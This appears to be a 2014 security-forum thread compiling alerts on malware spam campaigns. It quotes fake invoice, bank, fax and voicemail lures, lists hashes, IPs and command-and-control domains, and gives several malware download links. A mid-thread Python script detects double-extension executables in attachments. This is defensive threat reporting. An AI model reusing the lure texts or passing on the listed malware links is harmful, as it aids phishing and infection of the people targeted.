29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk
29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54*. This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___
Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email. All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like (slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...
Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55*. This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___
More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.
... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55*. This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___
'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”
The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___
Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."
Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/
:fear: :mad:
AplusWebMaster
2014-09-30, 13:46
FYI...
Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:
NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___
Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.
30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55*. This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/
:fear: :mad:
AplusWebMaster
2014-10-01, 13:51
FYI...
Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...
Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/
** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___
Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."
87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___
Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...
All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."
37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___
More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png
There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently; some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on your antivirus to protect you from these types of malware.
Today's Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___
Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
get copies of invoices. We will not be able to pay them. Please send clear invoices
1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55*. This 'Cashbuild Copied invoices' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___
GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___
DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/
*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/
:mad: :fear:
AplusWebMaster
2014-10-02, 13:58
FYI...
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-ids107587_815-fake-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Invoice-IDS107587_815.png
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake lawyer SPAM - PDF malware
- http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer
The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/41cf7ad7f6090e20412f05ef92b7b6a91499190a4ef4bc01fc52aac6cc7ed036/analysis/1412241170/
___
Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-94864-pm-shipping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...
The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...
2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f512adf0abfa86ce39d355b5c5f44be91d88012e9c3d6c2541d22c902eab4576/analysis/1412253608/
- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
___
Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-photos-insurance-company-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names and email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file (Windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___
Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santander-new-edocument-arrived-fake-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/santander_statement.png
... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___
O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
['Still more XP users than Vista, Win8, and Win8.1 combined]
___
Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake-email-regarding-outstanding-amount-contains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice
This email is sent from spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...
The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e09375d8ce97b76df1d2037a7f9511d5035a1bc35e87568995721349513386c7/analysis/1412243475/
The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD
The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/31ff7ccaae4f3fe15df8d52fe18e9017888ae13877eefbf9314e6d76cb32cefa/analysis/
:mad: :fear:
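Several of the samples quoted in this thread rely on the same two tricks: a document-looking extension in front of the real one (Invoice_815992488951.xls.scr, PAYMENT DETAILS.PDF .scr_56453.exe) and a spoofed icon so the file passes for a PDF, spreadsheet or photo. The check below is an added example, not code from myonlinesecurity, MX Lab or any other source quoted here: it opens a ZIP attachment, normalises the member name (whitespace padding stripped, every dot-separated token examined), and reads the first bytes of each member so an "MZ" executable named .jpeg is still caught. The ZIP and its contents are constructed inline (the executable bodies are an MZ header plus padding, not real malware); the extension lists are assumptions and not exhaustive.

```python
"""Triage a ZIP e-mail attachment for spoofed-icon / double-extension tricks.

Added example (not from any of the quoted blogs). File names and contents below
are constructed to mirror the samples quoted in this thread; the PE bodies are
just an 'MZ' header followed by padding, not real executables.
"""
import io
import re
import zipfile

# Extensions Windows runs on double-click (assumed list, not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta"}
# Extensions a recipient expects to be passive documents or media.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png",
                 "gif", "wav", "txt"}

# Magic bytes, checked before trusting anything in the file name.
MAGIC = [
    (b"MZ", "pe-executable"),
    (b"%PDF", "pdf"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG", "png"),
    (b"\xd0\xcf\x11\xe0", "ole2-office"),
    (b"PK\x03\x04", "zip"),
    (b"RIFF", "riff-wav"),
]


def sniff(data):
    """Return a coarse type from the first bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def extension_tokens(name):
    """Split 'PAYMENT DETAILS.PDF .scr_56453.exe' into normalised dot-tokens."""
    base = name.rsplit("/", 1)[-1].lower()
    # Whitespace padding is used to push the real extension out of view.
    tokens = [re.sub(r"\s+", "", t) for t in base.split(".")]
    return [t for t in tokens if t]


def assess_entry(name, data):
    """Return a sorted list of reasons this entry is suspicious (empty if clean)."""
    tokens = extension_tokens(name)
    ext = tokens[-1] if len(tokens) > 1 else ""
    earlier = tokens[1:-1]          # tokens between the base name and the real extension
    kind = sniff(data)
    reasons = set()
    if ext in EXECUTABLE_EXTS:
        reasons.add("executable-extension")
        if any(t in DOCUMENT_EXTS for t in earlier):
            reasons.add("double-extension")   # e.g. invoice.xls.scr
    if kind == "pe-executable" and ext not in EXECUTABLE_EXTS:
        reasons.add("content-mismatch")       # e.g. Img-0034.jpeg that starts with 'MZ'
    return sorted(reasons)


def scan_zip(zip_bytes):
    """Map each suspicious member name to its reasons; clean members are omitted."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(16)   # the magic check only needs the first bytes
            reasons = assess_entry(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip():
    """Constructed test attachment mirroring names quoted in this thread."""
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60    # not a real executable
    members = {
        "Invoice_815992488951.xls.scr": fake_pe,
        "PAYMENT DETAILS.PDF .scr_56453.exe": fake_pe,
        "Img-0034.jpeg": fake_pe,
        "mydocs.scr": fake_pe,
        "statement.pdf": b"%PDF-1.4\n% constructed, not a real document\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip(build_sample_zip()).items():
        print(f"{name!r}: {', '.join(reasons)}")
```

The name check alone would miss the .jpeg case, and the magic check alone would miss a genuine document that merely carries an executable extension, so both are kept; a mail gateway would run this on the attachment before the user ever sees an icon.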
AplusWebMaster
2014-10-03, 14:54
FYI...
Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-transactions-report-users-2014-09-28-2014-09-28-fake-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:
Your requested report is attached here...
3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e836820d947de6da456a61b37f9c9cdf749a61211b52a51a2aef0aab5786239f/analysis/1412331282/
___
Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/thanks-for-shopping-with-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...
In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/file/7b255b6d648f670bd7ecbae80983230fedbce13cfcf2e93a0887fba53b5c42ad/analysis/1412334793/
___
Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-personal-reply-id-509359-word-doc-malware/
